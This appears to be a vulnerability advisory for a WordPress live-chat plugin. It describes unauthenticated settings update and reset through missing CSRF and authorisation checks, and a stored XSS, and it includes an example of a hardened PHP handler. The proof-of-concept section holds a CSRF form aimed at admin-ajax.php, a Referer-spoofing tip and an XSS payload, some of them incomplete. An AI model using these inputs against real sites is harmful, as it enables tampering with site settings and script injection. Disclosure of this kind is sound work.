The lack of proper CSRF and Authorisation checks could allow an unauthenticated attacker to update or reset the plugin's settings. Furthermore, when updating the livechat_email option, no sanitisation is performed, leading to a Stored XSS issue in the plugin's settings page.
The CSRF and XSS issues were fixed in 3.7.3. However, the authorisation fix only added an is_admin() check, which only checks whether the dashboard or an admin panel is being displayed. The author was notified on July 2nd but has not responded or fixed the latter.
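A settings handler that closes all three gaps described above could look like the following. This is an added example, not the plugin's code: it assumes it runs inside WordPress, and the function names, the nonce and action names and the livechat_license_number option are hypothetical, while the request fields and the livechat_email option are the ones named in this advisory.

```php
<?php
// Added example (hypothetical names, see lead-in); runs inside WordPress.

// Insufficient gate: is_admin() is true for every request under /wp-admin/,
// including admin-ajax.php, whether or not anyone is logged in.
//     if ( is_admin() ) { /* update options */ }

// admin_post_{action} only fires for logged-in users (no _nopriv_ variant registered).
add_action( 'admin_post_example_livechat_save', 'example_livechat_save_settings' );

function example_livechat_save_settings() {
    // Authorisation: require the capability that guards site options.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Forbidden', '', array( 'response' => 403 ) );
    }
    // CSRF: verify a nonce bound to this action instead of inspecting the Referer.
    check_admin_referer( 'example_livechat_save', 'example_livechat_nonce' );

    // Sanitise on input: anything that is not a valid address is rejected.
    $number = isset( $_POST['licenseNumber'] )
        ? sanitize_text_field( wp_unslash( $_POST['licenseNumber'] ) ) : '';
    $email  = isset( $_POST['licenseEmail'] )
        ? sanitize_email( wp_unslash( $_POST['licenseEmail'] ) ) : '';
    if ( ! is_email( $email ) ) {
        wp_die( 'Invalid email address', '', array( 'response' => 400 ) );
    }

    update_option( 'livechat_license_number', $number ); // hypothetical option name
    update_option( 'livechat_email', $email );

    $back = wp_get_referer();
    wp_safe_redirect( $back ? $back : admin_url() );
    exit;
}

function example_livechat_render_form() {
    // Escape on output as well, so a value stored before the fix cannot execute.
    ?>
    <form action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>" method="POST">
        <input type="hidden" name="action" value="example_livechat_save"/>
        <?php wp_nonce_field( 'example_livechat_save', 'example_livechat_nonce' ); ?>
        <input type="text" name="licenseEmail"
               value="<?php echo esc_attr( get_option( 'livechat_email', '' ) ); ?>"/>
    </form>
    <?php
}
```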
Proof of Concept
Unauthenticated Option Reset:
Unauthenticated Option Update (make sure the Referer of the request contains livechat_settings, for example "Referer: livechat_settings"):
<form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="licenseNumber" value="42"/>
<input type="hidden" name="licenseEmail" value="whatever"/>
Unauthenticated Stored XSS:
Like the PoC above, but replace the licenseEmail value with "><svg/onload=alert(/XSS/)>